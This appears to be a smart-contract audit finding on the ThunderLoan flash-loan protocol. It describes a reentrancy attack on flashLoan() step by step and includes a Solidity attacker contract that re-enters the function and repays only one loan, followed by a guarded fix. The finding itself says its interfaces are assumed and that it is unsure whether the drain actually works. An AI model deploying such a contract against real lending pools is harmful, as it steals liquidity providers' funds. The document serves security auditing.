An attacker can perform a reentrancy attack through the function above: the receiver contract that the protocol calls back into re-enters flashLoan(), takes several loans inside one call chain, and repays them as if they were a single loan.
Attacker: the malicious user.
Victim: other users, LPs, ThunderLoan.
Protocol: The ThunderLoan contract itself.
Initial State: the protocol is deployed and holds liquidity deposited by LPs.
Step 1: the attacker calls flashLoan() from a malicious contract that implements the flash loan receiver callback.
Step 2: after transferring the loan, the protocol makes an external call into the attacker's contract before it checks repayment. That callback is the re-entry point (an ERC20 transfer does not trigger receive(); the vulnerable call is the one the protocol makes into the receiver). The attacker's callback calls flashLoan() again for the same amount, and each nested call reads a lower startingBalance because the earlier loans have already left the pool.
Step 3: the attacker repays only what the innermost flashLoan() call demands and exits.
The attacker can take several loans and repay them as one, draining a large share of the pool's funds.
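The following Solidity is an added example written for this finding; it is not code from the ThunderLoan repository, and the IThunderLoan/IFlashLoanReceiver signatures, the repay() call and the fee constant are assumptions that must be checked against the audited contract. The first contract is the receiver described in Steps 1 to 3: it re-enters flashLoan() from the callback a fixed number of times and repays once from the innermost frame. The second contract is the hardened form of the lending function: a reentrancy guard makes every nested flashLoan() call revert, so the balance read after the callback cannot be disturbed by a second loan. Note that each nested call still runs its own post-callback balance check, so a PoC against the real contract should confirm which checks actually bind before the severity is settled.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not ThunderLoan code. Interface shapes below are assumptions.
interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function approve(address, uint256) external returns (bool);
}

interface IThunderLoan {
    function flashLoan(address receiver, IERC20 token, uint256 amount, bytes calldata params) external;
    function repay(IERC20 token, uint256 amount) external; // assumed repayment entry point
}

interface IFlashLoanReceiver {
    function executeOperation(address token, uint256 amount, uint256 fee, address initiator, bytes calldata params)
        external returns (bool);
}

// Attacker contract (Steps 1-3): re-enters flashLoan() `maxDepth` times from the callback,
// then repays a single loan from the innermost frame.
contract ReentrantReceiver is IFlashLoanReceiver {
    IThunderLoan public immutable pool;
    IERC20 public immutable token;
    uint256 public immutable maxDepth;
    uint256 public depth;

    constructor(IThunderLoan _pool, IERC20 _token, uint256 _maxDepth) {
        pool = _pool;
        token = _token;
        maxDepth = _maxDepth;
    }

    // Step 1: the attacker opens the first loan.
    function attack(uint256 amount) external {
        token.approve(address(pool), type(uint256).max); // lets repay() pull funds back
        pool.flashLoan(address(this), token, amount, "");
    }

    // Step 2: the protocol calls back here after sending the loan; re-enter with the same amount.
    function executeOperation(address, uint256 amount, uint256 fee, address, bytes calldata)
        external override returns (bool)
    {
        require(msg.sender == address(pool), "only pool");
        if (depth < maxDepth) {
            depth++;
            pool.flashLoan(address(this), token, amount, ""); // nested loan, lower startingBalance
        } else {
            // Step 3: innermost frame repays once.
            pool.repay(token, amount + fee);
        }
        return true;
    }
}

// Hardened form: a reentrancy guard on the lending function.
abstract contract ReentrancyGuarded {
    uint256 private locked = 1;
    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }
}

contract GuardedFlashLender is ReentrancyGuarded {
    IERC20 public immutable token;
    uint256 public constant FEE_BPS = 30; // assumed fee, 0.3%, for the example only

    constructor(IERC20 _token) { token = _token; }

    // Any flashLoan() call made from inside the callback reverts at the guard,
    // so startingBalance and the final check refer to the same, undisturbed pool.
    function flashLoan(address receiver, uint256 amount) external nonReentrant {
        uint256 startingBalance = token.balanceOf(address(this));
        require(amount <= startingBalance, "insufficient liquidity");
        uint256 fee = (amount * FEE_BPS) / 10_000;
        require(token.transfer(receiver, amount), "transfer failed");
        // The only external call: the receiver is expected to transfer amount + fee back before returning.
        require(
            IFlashLoanReceiver(receiver).executeOperation(address(token), amount, fee, msg.sender, ""),
            "callback failed"
        );
        require(token.balanceOf(address(this)) >= startingBalance + fee, "not paid back");
    }
}
```

In the guarded lender, the receiver repays by transferring tokens straight back to the lender inside the callback; if the attacker's callback tries to borrow again, the `nonReentrant` modifier reverts the whole call chain and no funds leave the pool.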
Manual review